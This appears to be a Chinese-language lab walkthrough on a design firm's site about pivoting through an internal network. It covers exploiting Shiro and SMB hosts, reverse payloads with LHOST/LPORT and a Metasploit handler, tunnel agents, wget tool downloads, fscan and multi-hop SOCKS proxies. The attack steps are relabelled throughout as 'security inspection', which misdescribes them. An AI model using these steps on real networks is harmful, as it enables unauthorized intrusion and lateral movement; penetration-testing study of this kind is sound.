尧图网站设计 尧图网站设计YAOTU DESIGN
ARTICLE DETAIL

资讯详情

深耕网站设计与一线实操的经验洞察。

内网安全防护实践:从攻击视角理解防御要点

内网安全防护实践:从攻击视角理解防御要点 安全免责声明本文所有操作步骤仅限在已获授权的测试环境中进行严禁用于任何未授权系统。作者不对任何非法使用本文内容的行为负责请读者务必遵守相关法律法规。第一部分内网安全防护基础阶段一环境准备步骤1准备安全测试环境在搭建内网安全测试环境时需要准备必要的安全检测工具和防护软件并将其部署到测试主机上。步骤2启动安全监控服务端在安全监控主机上启动监控服务端程序启动完成后保持该终端开启用于收集和分析内网流量。步骤3为安全检测工具配置执行权限在测试主机上为安全检测工具程序配置执行权限chmod x security_tool步骤4配置安全监控服务端在安全监控服务端管理界面中进行相关配置包括监控连接名称、隧道类型等参数的设置。阶段二安全通道建立步骤5在目标机运行安全客户端在已授权的测试主机上执行安全客户端连接命令将目标机与安全监控服务端建立加密连接./client -server192.168.196.145:8024 -vkeyyour_key -typetcp阶段三安全监控与代理配置步骤6接入安全监控平台并配置代理完成安全通道连接后第一层访问权限已建立。此时接入安全监控平台并配置代理以访问内网进行安全巡检。阶段四内网安全巡检步骤7对内网进行安全巡检将当前会话挂到后台bg命令新建一个shell窗口进行内网安全巡检。步骤8发现目标主机巡检发现目标主机 10.10.135.35对其进一步进行安全评估。阶段五SMB服务安全评估步骤9识别目标系统与服务安全评估发现目标运行的是 Windows 6.1 系统注意Windows官方并无6.1版本编号此为扫描工具识别结果同时发现445端口开放通常运行SMB服务。步骤10检查弱口令风险利用扫描到的信息检查SMB服务是否存在弱口令风险发现存在弱口令账户需及时整改。步骤11验证连接尝试连接发现无法成功登录可能是假会话或网络隔离。步骤12SMB匿名访问检查尝试使用SMB匿名登录进行信息收集评估是否存在匿名访问风险。步骤13修改代理端口号调整代理端口配置确保后续工具能正确通过代理访问内网目标。步骤14获取目标版本号通过枚举手段获取目标SMB服务的详细版本号。步骤15查询版本漏洞信息将获取到的版本号查询漏洞数据库可借助AI工具辅助分析确定需要修复的安全漏洞。阶段六SMB漏洞验证与修复步骤16使用安全检测模块验证漏洞根据查询到的漏洞信息在安全监控平台中选择对应的检测模块验证漏洞是否存在。步骤17配置代理后成功验证未设置代理时无法连接到内网目标。配置好代理参数后重新执行检测成功确认目标存在安全风险。步骤18Shell升级获取的shell功能较为基础按照提示添加参数进行升级获得更完整的交互式shell。步骤19重命名会话对升级后的session进行重命名便于后续多会话管理。阶段七安全工具部署与端口转发步骤20进入session部署安全工具进入目标shell部署必要的安全检测工具如fscan、安全客户端等到目标主机。步骤21给工具添加执行权限部署完成后给工具文件添加执行权限。步骤22配置端口转发回到session1Shiro会话配置端口转发使SMB上的安全检测程序能回连到安全监控主机。【提示】注意这里的目的让SMB上的安全检测程序能回连到安全监控主机。实际上SMB已经接入监控此步骤是为了将安全巡检流程走完整。阶段八安全检测程序部署与二次接入步骤23生成安全检测程序利用安全工具生成安全检测程序文件。注意IP和端口必须填写Shiro的IP和端口与安全通道配置保持一致。tool -p payload LHOSTShiro_IP LPORT端口 -f 格式 文件名步骤24运行检测程序获取新SMB会话在目标主机上运行生成的安全检测程序会新接入一个SMB会话。步骤25验证新会话验证新接入的SMB会话与之前的session功能一致确认安全巡检链路正常。阶段九最终代理配置与内网巡检步骤26配置最终代理完成前述步骤后进行最后的代理配置确保能从安全监控主机访问内网所有服务。第二部分多层内网安全巡检阶段十重启环境重新巡检步骤27重启虚拟机由于网络中断等原因导致巡检环境异常时可重启虚拟机从头重新巡检。步骤28公式化接入Shiro按照之前的流程重新通过Shiro漏洞利用获取目标权限。阶段十一安全监控服务端启动步骤29启动安全监控服务端在安全监控主机上启动监控服务端程序监听指定端口./admin -l 1111 -s your_key步骤30在Shiro上运行客户端在已获取权限的Shiro目标机上运行安全客户端程序连接安全监控服务端./node -c 192.168.196.180:1111 -s your_key阶段十二节点连接与SOCKS代理步骤31在node0上开启SOCKS代理在已连接的node0节点上开启SOCKS代理功能将内网流量转发到安全监控主机。步骤32配置端口配置代理端口参数确保与本地代理设置一致。阶段十三验证连接与SMB接入步骤33尝试连接8080端口通过已配置的代理尝试连接之前扫描到的8080端口验证内网巡检是否生效。步骤34连接成功验证能够成功连接到8080端口说明多层内网巡检配置成功。步骤35接入SMB利用巡检链路将SMB服务也接入到安全监控平台中。步骤36在node0上开启监听在node0节点上开启监听端口等待安全检测程序回连。步骤37上传node到SMB将node程序上传到SMB目标主机。步骤38给node添加执行权限给上传的node程序添加执行权限。步骤39运行node连接监听端口在SMB目标机上运行node程序连接node0上的监听端口建立新的巡检节点。步骤40node1接入新的node1节点成功接入表示多层巡检链路已打通。阶段十四最终验证步骤41在node1上开启SOCKS代理在node1节点上开启SOCKS代理通过第二层巡检访问更深层的内网服务。步骤42修改端口配置并连接修改代理配置文件中的端口号再次尝试连接目标服务。步骤43巡检成功验证能够成功连接说明通过安全监控工具实现的多层内网巡检实验成功完成。附录常用命令速查操作场景命令/操作安全客户端连接./client -server服务器IP:8024 -vkey密钥 -typetcp安全监控服务端启动./admin -l 端口 -s 密钥安全客户端连接./node -c 服务端IP:端口 -s 密钥安全检测程序生成tool -p payload LHOSTIP LPORT端口 -f 格式 文件名安全监控平台监听console use exploit/multi/handler set PAYLOAD set LHOST set LPORT exploit上传文件(wget)wget http://监控主机IP:端口/文件名查看文件ls -la验证完整性md5sum 文件名添加执行权限chmod x 文件名fscan内网安全巡检./fscan -h 网段SMB匿名访问检查smbclient //IP/share -N安全监控会话管理sessions -l列表 sessions ID进入 shell交互安全路由添加run autoroute -s 网段/24
返回列表